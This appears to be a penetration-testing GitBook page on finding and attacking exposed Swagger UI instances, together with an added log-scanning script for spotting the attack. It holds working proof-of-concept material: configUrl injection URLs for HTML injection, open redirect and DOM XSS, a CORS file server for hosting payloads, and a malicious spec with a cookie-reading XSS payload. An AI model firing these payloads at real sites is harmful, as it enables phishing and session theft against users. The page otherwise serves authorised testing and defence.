# Swagger UI

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Nuclei template

{% embed url="<https://github.com/coffinxp/nuclei-templates/blob/main/Swagger.yaml>" %}

{% embed url="<https://github.com/coffinxp/swagger/blob/main/Swagger.yaml>" %}

## Find Exposed Swagger

{% embed url="<https://github.com/brinhosa/apidetector/tree/main>" %}

### Wordlist

```
https://example.com/swagger.yaml
https://example.com/swagger.json
https://example.com/api-docs
https://example.com/v2/api-docs (Swagger 2.0)
https://example.com/v3/api-docs (OpenAPI 3)
```

{% embed url="<https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/swagger.txt>" %}

{% embed url="<https://github.com/coffinxp/swagger/blob/main/swagger-wordlist.txt>" %}

## OSINT

{% embed url="<https://github.com/UndeadSec/SwaggerSpy>" %}

## Audit endpoints

{% embed url="<https://github.com/BishopFox/sj>" %}

{% content-ref url="rest-api" %}
[rest-api](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/rest-api)
{% endcontent-ref %}

### Burp Extension

Parse OpenAPI documentation with the OpenAPI Parser BApp.

{% embed url="<https://portswigger.net/bappstore/6bf7574b632847faaaa4eb5e42f1757c>" %}

## Get versions and their vulnerabilities

{% embed url="<https://github.com/ArcHound/swagger-ui-detector>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FUMey7SBIooUZki0dPI3B%2Fimage.png?alt=media&#x26;token=cc0cab1c-d9e1-442a-84b5-04cebc886ab7" alt=""><figcaption></figcaption></figure>

## Find old versions of Swagger-ui vulnerable to various XSS attacks - XSSwagger

{% embed url="<https://github.com/vavkamil/XSSwagger>" %}

## CVE-2018-25031

Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks.

{% embed url="<https://www.exploit-db.com/exploits/51379>" %}

{% embed url="<https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/>" %}

{% embed url="<https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96>" %}

Test: `/api/docs/?configUrl=https://jumpy-floor.surge.sh/test.json`

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fh8GPLan4nAKFSQL0yITD%2Fimage.png?alt=media&#x26;token=870661b8-c74c-4b0a-aedd-886ea03c860d" alt=""><figcaption></figcaption></figure>

### Repo

{% embed url="<https://github.com/coffinxp/swagger>" %}

Once you have found a Swagger UI, try each file of the repo:

```
# HTML Injection - Display a login form
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json
# Phishing method - Open Redirect - If the victim clicks on evil.com
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json
# DOM XSS
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.json
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json
```
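From the defender's side, the requests above leave a distinctive trace: a hit on the docs path with `configUrl` or `url` pointing at a foreign origin. The following added example (not from this page or any of the linked projects) flags such lines in a Common Log Format access log; the log lines, hostnames and mount paths are constructed.

```python
"""Flag Swagger UI config-injection attempts in web access logs.

Added example, not from the original page or the swagger-ui project. Swagger UI
before 4.1.3 reads `configUrl` and `url` from the query string, so a docs request
whose value points at another origin is the trace the PoCs above leave behind.
Log lines, hostnames and mount paths below are constructed for the demo.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

RISKY_PARAMS = ("configUrl", "url")  # parameters that make the UI load a remote spec/config
DOCS_PATH_RE = re.compile(r"/(swagger|api-docs|api/docs|docs)\b", re.I)  # adjust to your mounts
LOG_RE = re.compile(  # Common Log Format; only the fields we need are captured
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one injection, one relative `url`, one same-origin `url`, one non-docs path.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /api/docs/?configUrl=https://attacker.example/test.json HTTP/1.1" 200 1234
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /api/docs/?url=/v3/api-docs HTTP/1.1" 200 1234
198.51.100.8 - - [10/Oct/2023:13:57:10 +0000] "GET /api/docs/?url=https://api.example.com/v3/api-docs HTTP/1.1" 200 1234
192.0.2.9 - - [10/Oct/2023:13:58:00 +0000] "GET /login?url=https://evil.example/x HTTP/1.1" 302 0
"""


def classify(line: str, own_host: str) -> Optional[dict]:
    """Return a finding if the request points Swagger UI at a foreign origin, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if not DOCS_PATH_RE.search(target.path):
        return None  # not a Swagger UI path; the parameter means something else there
    for param, values in parse_qs(target.query).items():
        if param not in RISKY_PARAMS:
            continue
        for value in values:
            ref = urlsplit(value)
            # Relative paths and same-host URLs are how the UI is normally configured.
            if ref.scheme in ("http", "https") and ref.hostname and ref.hostname.lower() != own_host.lower():
                return {"ip": m["ip"], "path": target.path, "param": param, "remote_host": ref.hostname}
    return None


def scan_log(text: str, own_host: str) -> List[dict]:
    """Run classify() over every line and collect the findings."""
    findings = (classify(line, own_host) for line in text.splitlines())
    return [f for f in findings if f]
```

Swagger UI 4.1.3 and later ignore these parameters unless `queryConfigEnabled` is turned on, so a finding against an upgraded instance is an attempt rather than a successful exploit.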

### Cookie Stealing

Serve the PoC files with a permissive CORS header (Swagger UI fetches the config cross-origin):

```python
from http.server import SimpleHTTPRequestHandler
import socketserver


class CORSRequestHandler(SimpleHTTPRequestHandler):
    """Static file server that lets any origin fetch the hosted files."""

    def end_headers(self):
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS')
        super().end_headers()


if __name__ == "__main__":
    PORT = 80  # privileged port: run with sufficient rights or pick e.g. 8000
    with socketserver.TCPServer(("", PORT), CORSRequestHandler) as httpd:
        print("Serving at port", PORT)
        httpd.serve_forever()
```

POC: `test.json`

```json
{
  "url": "http://IP/test.yaml",
  "urls": [
    {
      "url": "http://IP/test.yaml",
      "name": "Foo"
    }
  ]
}
```

POC: `test.yaml`

```yaml
swagger: '2.0'
info:
  title: XSS Attack BY 0xss0rz
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F8sCkLTNiE7dpSN12kztL%2Fimage.png?alt=media&#x26;token=d99a2af3-cd1a-4e95-8c5d-22ab6cbd54de" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F1WP06vbOYwIUTnPKzeXR%2Fimage.png?alt=media&#x26;token=03eab639-1f9a-44b8-a3cc-5e82be1ddf00" alt=""><figcaption></figcaption></figure>

The same injection point can also lead to CSS-based exfiltration:

{% embed url="<https://github.com/tarantula-team/CSS-injection-in-Swagger-UI?tab=readme-ov-file>" %}

## Postman / Scanner

{% embed url="<https://stackoverflow.com/questions/48525546/how-to-export-swagger-json-or-yaml>" %}

```
http://url/swagger/docs/v1
http://url/<contextPath>/v3/api-docs # JSON file
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FWOVekyEt955COf5KWSFb%2F0rOuY.png?alt=media&#x26;token=2d03b77d-79d1-42f7-a810-fdb857d2402c" alt=""><figcaption></figcaption></figure>

or check the page source for the spec URL:

```
const ui = SwaggerUIBundle({
  url: "https://petstore.swagger.io/v2/swagger.json",     // <-------
  dom_id: '#swagger-ui',
```

or use the browser dev tools:

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F0A7EI4gpLVtBTa2OTovy%2FfqMcV.png?alt=media&#x26;token=e3c732a2-5d71-49e3-ba88-07057d2f169b" alt=""><figcaption></figcaption></figure>

```
curl -o swagger.yaml https://example.com/swagger.yaml
```

If the Swagger spec is a JSON file, use yq to convert it (`pip install yq` or `apt install yq`):

```
curl -s https://example.com/swagger.json | yq -P > swagger.yaml
```

You can now import the YAML file into Postman or use it in a scanner like ZAP.

{% content-ref url="postman-usage" %}
[postman-usage](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/postman-usage)
{% endcontent-ref %}

{% content-ref url="zap-scanner-and-other-scanning-methods" %}
[zap-scanner-and-other-scanning-methods](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/zap-scanner-and-other-scanning-methods)
{% endcontent-ref %}

### SOAPi

{% embed url="<https://github.com/andrei8055/SOAPI>" %}

### Other Scanners

{% content-ref url="tools-and-scanners" %}
[tools-and-scanners](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/tools-and-scanners)
{% endcontent-ref %}

## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**Hacking APIs: Breaking Web Application Programming Interfaces**](https://www.amazon.fr/dp/1718502443?tag=0xss0rz-21)\
  A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.
* [**Black Hat GraphQL: Attacking Next Generation APIs**](https://www.amazon.fr/dp/B0B7Q8BYG1?tag=0xss0rz-21)\
  This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
